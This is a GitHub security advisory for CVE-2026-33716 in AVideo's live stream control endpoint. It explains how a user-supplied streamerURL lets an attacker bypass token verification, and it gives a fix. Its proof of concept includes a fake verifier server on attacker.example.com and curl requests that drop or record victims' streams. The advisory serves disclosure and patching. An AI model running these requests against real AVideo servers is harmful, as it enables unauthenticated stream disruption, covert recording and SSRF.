GHSA-9HV9-GVWM-95F2

Vulnerability from github – Published: 2026-03-25 21:28 – Updated: 2026-03-25 21:28
VLAI?
Summary
AVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php
Details

Summary

The standalone live stream control endpoint at plugin/Live/standAloneFiles/control.json.php accepts a user-supplied streamerURL parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns {"error": false}, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence.

Details

The vulnerability exists because the streamerURL parameter is accepted directly from user input with no validation:

plugin/Live/standAloneFiles/control.json.php:77-79 — User input overrides server config:

if (!empty($_REQUEST['streamerURL'])) {
    $streamerURL = $_REQUEST['streamerURL'];
}

plugin/Live/standAloneFiles/control.json.php:83-91 — The user-controlled value is assigned to the request object:

$obj->streamerURL = $streamerURL;

plugin/Live/standAloneFiles/control.json.php:115-126 — Token verification is sent to the attacker-controlled URL:

$verifyTokenURL = "{$obj->streamerURL}plugin/Live/verifyToken.json.php?token={$obj->token}";
// ...
$content = file_get_contents($verifyTokenURL, false, stream_context_create($arrContextOptions));

The legitimate verifyToken.json.php performs cryptographic token validation via Live::decryptHash() and checks token expiry (12-hour window). By redirecting verification to an attacker server, all of this is bypassed — the attacker's server simply responds with {"error": false}.

After authentication is bypassed, the attacker can execute any of the four supported commands (lines 150-186): record_start, record_stop, drop_publisher, and is_recording, which issue control commands to the local NGINX RTMP control module.

SSL verification is also explicitly disabled (lines 119-124), meaning the SSRF request will follow any attacker URL without certificate validation.

Notably, the developers were aware of this exact attack pattern and fixed it in the sibling file standAloneFiles/saveDVR.json.php on 2026-03-19 with an explicit comment: "SECURITY: User-supplied webSiteRootURL is intentionally NOT accepted. Allowing it would enable SSRF." The same fix was not applied to control.json.php.

PoC

Step 1: Set up an attacker server that returns {"error": false} for all requests.

# Minimal Python server on attacker machine (attacker.example.com:8888)
python3 -c '
import http.server, json
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type","application/json")
        self.end_headers()
        self.wfile.write(json.dumps({"error": False}).encode())
    def log_message(self, *a): pass
http.server.HTTPServer(("0.0.0.0", 8888), H).serve_forever()
'

Step 2: Drop a victim's live stream (kill their broadcast):

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=drop_publisher&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Expected response (authentication bypassed, command executed):

{"error":false,"msg":"","streamerURL":"http://attacker.example.com:8888/","token":"anything","command":"drop_publisher","app":"live","name":"VICTIM_STREAM_KEY","response":"","requestedURL":"http://localhost:8080/control/drop/publisher?app=live&name=VICTIM_STREAM_KEY"}

Step 3: Start unauthorized recording of a victim's stream:

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=record_start&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Step 4: Probe whether a stream name is active:

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=is_recording&name=GUESS_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Impact

  • Denial of Service on Live Streams: Any unauthenticated attacker can terminate any active live broadcast using drop_publisher, causing immediate disruption for streamers and viewers.
  • Unauthorized Recording: An attacker can start recording any live stream without authorization using record_start, potentially capturing private or sensitive content.
  • Stream Enumeration: The is_recording command allows probing for valid stream names.
  • SSRF: The server makes an outbound HTTP request to an attacker-controlled URL via file_get_contents(), which could be used to scan internal services or exfiltrate data via the request URL.
  • No authentication required: The entire attack is performed without any credentials.

Recommended Fix

Remove the streamerURL request parameter override entirely, matching the fix already applied in saveDVR.json.php. In plugin/Live/standAloneFiles/control.json.php, replace lines 77-79:

// BEFORE (vulnerable):
if (!empty($_REQUEST['streamerURL'])) {
    $streamerURL = $_REQUEST['streamerURL'];
}

// AFTER (fixed):
// SECURITY: User-supplied streamerURL is intentionally NOT accepted.
// Allowing it would enable authentication bypass and SSRF via file_get_contents
// on an attacker-controlled host. streamerURL MUST come from the configuration
// file or be hard-coded in this file above.
if (empty($streamerURL)) {
    error_log("control.json.php: streamerURL is not configured");
    die(json_encode(['error' => true, 'msg' => 'Server not configured']));
}
Severity ?
9.4 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33716"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T21:28:21Z",
    "nvd_published_at": "2026-03-23T19:16:42Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{\"error\": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence.\n\n## Details\n\nThe vulnerability exists because the `streamerURL` parameter is accepted directly from user input with no validation:\n\n**`plugin/Live/standAloneFiles/control.json.php:77-79`** \u2014 User input overrides server config:\n```php\nif (!empty($_REQUEST[\u0027streamerURL\u0027])) {\n    $streamerURL = $_REQUEST[\u0027streamerURL\u0027];\n}\n```\n\n**`plugin/Live/standAloneFiles/control.json.php:83-91`** \u2014 The user-controlled value is assigned to the request object:\n```php\n$obj-\u003estreamerURL = $streamerURL;\n```\n\n**`plugin/Live/standAloneFiles/control.json.php:115-126`** \u2014 Token verification is sent to the attacker-controlled URL:\n```php\n$verifyTokenURL = \"{$obj-\u003estreamerURL}plugin/Live/verifyToken.json.php?token={$obj-\u003etoken}\";\n// ...\n$content = file_get_contents($verifyTokenURL, false, stream_context_create($arrContextOptions));\n```\n\nThe legitimate `verifyToken.json.php` performs cryptographic token validation via `Live::decryptHash()` and checks token expiry (12-hour window). By redirecting verification to an attacker server, all of this is bypassed \u2014 the attacker\u0027s server simply responds with `{\"error\": false}`.\n\nAfter authentication is bypassed, the attacker can execute any of the four supported commands (lines 150-186): `record_start`, `record_stop`, `drop_publisher`, and `is_recording`, which issue control commands to the local NGINX RTMP control module.\n\nSSL verification is also explicitly disabled (lines 119-124), meaning the SSRF request will follow any attacker URL without certificate validation.\n\nNotably, the developers were aware of this exact attack pattern and fixed it in the sibling file `standAloneFiles/saveDVR.json.php` on 2026-03-19 with an explicit comment: *\"SECURITY: User-supplied webSiteRootURL is intentionally NOT accepted. Allowing it would enable SSRF.\"* The same fix was not applied to `control.json.php`.\n\n## PoC\n\n**Step 1:** Set up an attacker server that returns `{\"error\": false}` for all requests.\n\n```bash\n# Minimal Python server on attacker machine (attacker.example.com:8888)\npython3 -c \u0027\nimport http.server, json\nclass H(http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200)\n        self.send_header(\"Content-Type\",\"application/json\")\n        self.end_headers()\n        self.wfile.write(json.dumps({\"error\": False}).encode())\n    def log_message(self, *a): pass\nhttp.server.HTTPServer((\"0.0.0.0\", 8888), H).serve_forever()\n\u0027\n```\n\n**Step 2:** Drop a victim\u0027s live stream (kill their broadcast):\n\n```bash\ncurl -s \"https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything\u0026command=drop_publisher\u0026name=VICTIM_STREAM_KEY\u0026app=live\u0026streamerURL=http://attacker.example.com:8888/\"\n```\n\nExpected response (authentication bypassed, command executed):\n```json\n{\"error\":false,\"msg\":\"\",\"streamerURL\":\"http://attacker.example.com:8888/\",\"token\":\"anything\",\"command\":\"drop_publisher\",\"app\":\"live\",\"name\":\"VICTIM_STREAM_KEY\",\"response\":\"\",\"requestedURL\":\"http://localhost:8080/control/drop/publisher?app=live\u0026name=VICTIM_STREAM_KEY\"}\n```\n\n**Step 3:** Start unauthorized recording of a victim\u0027s stream:\n\n```bash\ncurl -s \"https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything\u0026command=record_start\u0026name=VICTIM_STREAM_KEY\u0026app=live\u0026streamerURL=http://attacker.example.com:8888/\"\n```\n\n**Step 4:** Probe whether a stream name is active:\n\n```bash\ncurl -s \"https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything\u0026command=is_recording\u0026name=GUESS_STREAM_KEY\u0026app=live\u0026streamerURL=http://attacker.example.com:8888/\"\n```\n\n## Impact\n\n- **Denial of Service on Live Streams:** Any unauthenticated attacker can terminate any active live broadcast using `drop_publisher`, causing immediate disruption for streamers and viewers.\n- **Unauthorized Recording:** An attacker can start recording any live stream without authorization using `record_start`, potentially capturing private or sensitive content.\n- **Stream Enumeration:** The `is_recording` command allows probing for valid stream names.\n- **SSRF:** The server makes an outbound HTTP request to an attacker-controlled URL via `file_get_contents()`, which could be used to scan internal services or exfiltrate data via the request URL.\n- **No authentication required:** The entire attack is performed without any credentials.\n\n## Recommended Fix\n\nRemove the `streamerURL` request parameter override entirely, matching the fix already applied in `saveDVR.json.php`. In `plugin/Live/standAloneFiles/control.json.php`, replace lines 77-79:\n\n```php\n// BEFORE (vulnerable):\nif (!empty($_REQUEST[\u0027streamerURL\u0027])) {\n    $streamerURL = $_REQUEST[\u0027streamerURL\u0027];\n}\n\n// AFTER (fixed):\n// SECURITY: User-supplied streamerURL is intentionally NOT accepted.\n// Allowing it would enable authentication bypass and SSRF via file_get_contents\n// on an attacker-controlled host. streamerURL MUST come from the configuration\n// file or be hard-coded in this file above.\nif (empty($streamerURL)) {\n    error_log(\"control.json.php: streamerURL is not configured\");\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Server not configured\u0027]));\n}\n```",
  "id": "GHSA-9hv9-gvwm-95f2",
  "modified": "2026-03-25T21:28:21Z",
  "published": "2026-03-25T21:28:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9hv9-gvwm-95f2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33716"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/388fcd57dbd16f6cb3ebcdf1d08cf2b929941128"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.